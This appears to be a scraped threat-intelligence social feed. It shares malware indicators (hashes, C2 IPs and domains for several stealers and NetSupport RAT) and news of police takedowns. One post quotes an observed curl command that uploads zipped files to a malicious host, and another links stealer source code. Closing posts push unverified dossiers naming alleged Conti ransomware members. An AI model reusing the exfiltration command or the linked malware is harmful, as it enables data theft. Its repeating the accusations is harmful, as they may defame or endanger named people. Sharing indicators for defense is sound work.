Cryptolaemus

Results of a wonderful partnership among LEA across the world to make it a better place! We have come far since this all started eating mealybugs(Emotet).🙂We are thankful for this partnership and to play a role in this to make a difference. We are a bit hungry though now... 🤔

Odyssey Stealer c52291b86ac04d671c1c27c3afa70d17 C2 213.209.159.175 Interesting string related to ChatGPT , Junk / Webpage leftovers ? #OdysseyStealer #Stealer #MAC #IOC

After getting fired from ungrateful AWS after outage where my job was to vibecode all the DNS entries to IPv6, happy to announce it's my 1st day at Azure Azure recognizes the value of vibecoding IPv6 DNS and I just force pushed my first 1m entries Now off to grab some coffee

@Inifintyink @RussianPanda9xx Salve amice vetus, quid anatibus accidit?

@RussianPanda9xx LockBIt ?

Hear me out, a locker written in bash - that would be quite cool.

We have shared a Special Report on IPs infected with Latrodectus malware during 2025-04-26 to 2025-05-20. This is one of the results of the continued international Law Enforcement action called Operation Endgame Season 2.0 Over 44K infected IPs seen: dashboard.shadowserver.org/statistics/com…

Octalyn Stealer 31a11e53ebee97b9add3d6a7567f7d16 Telegram: https://t[.]me/ZeroTraceD3V YouTube: https://www[.]youtube[.]com/watch?v=TN9yas3uqr0 GitHub: https://github[.]com/luis22d/Octalyn-Stealer-C-Telegram #Octalyn #Stealer #IOC

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…). Botnet: grp0005 C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024). Bumblebee has been used in ransomware attacks. @malwrhunterteam

In een internationale operatie heeft Team High Tech Crime, onder gezag van @landelijkparket, een sleuteldienst voor ontwikkelaars van #malware onderuitgehaald. Hierdoor worden slachtoffers van malware voorkomen. Lees meer: politie.nl/nieuws/2025/me… #bestrijding #cybercriminaliteit

#LummaStealer #ioc t[.]me/vstalnasral555 => pavpwe[.]run/ptla

Probably the best #ZhongStealer decoy yet. 59af8a487068c555ea22393b0233cb65 Sent to user disguised as an image. "2020505268988jpg.pif" #Signed with EV Certificate "运城市盐湖区风颜商贸有限公司" 🔗🧵

troubleinternetverif.]com/ HzGTvHpk.txt Xg6fkCIC.txt cloudverifsecure.]com/o8fZccbu.txt 👇 83.222.190.]174 #netsupport #rat Client32.ini bb6ccd9de0cbae55bc41a0984c4a7630 thanksbadbeer.]com beerbadlove.]com Samples bazaar.abuse.ch/browse/tag/83-… app.any.run/tasks/e3ff4332… @500mk500

👇 cahasdxca123.]com/lander/jdfcxn/ pass. py exts. py script.enc 👇 "C:\WINDOWS\system32\curl.exe" -X POST https://domainservicecontrol.[com/upload.php -F file=@C:\\Temp\*.zip Related Samples bazaar.abuse.ch/browse/tag/cah… AnyRun app.any.run/tasks/3b904d30… @500mk500 @skocherhan @k3dg3

Police takes down AVCheck antivirus site used by cybercriminals - @billtoulas bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

Germany doxxes Conti ransomware and TrickBot ring leader - @serghei bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

77[.]83[.]207[.]89 AS216341 OPTIMA LLC 🇭🇰 godblessyou[.]world blessyoumother[.]world wheremylifestreet[.]cloud clientforbigbug[.]cloud sunriseopen[.]com #NetSupportRAT @anyrun_app @abuse_ch

AvCheck[.]net has been seized by law enforcement. AVCheck was used by criminals to test whether their malware is detected by commercial antivirus software before its ready to be used in the wild. Similar to something like VirusTotal. This takedown is apart of Operation Endgame.

1/ First comes Stern. Then Tramp (aka Trump). And then the rest. These are the people behind Conti, Trickbot, Black Basta. Their anonymity ends now. 🧵👇

💥EXPOSED: We uncovered the Professor behind Conti Ransomware! Dossier, flights, docs, leaks. 🔗Full evidence here: justpaste.it/ilpg5 💰 $10M bounty on the line — and we're burning another $10M to take them down. Share now! #Conti #Trickbot #Cybersecurity

💥 The Reveal: Stern’s New Face Remember when I promised to reveal the new face of the Conti leader after his plastic surgery? The time has come. 📄 Updated Dossier: justpaste.it/ilesl Stern thought changing his appearance would keep him safe. Turns out, it wasn’t enough. The exposure continues. Stay tuned for more updates. #Ransomware #Conti #Trickbot

🚨 New Investigation: Bondarenko Arkady — Negotiator for the Conti Group. 🔗Details, analysis, and Dossier: justpaste.it/iqo8u #Conti #Cybercrime #Ransomware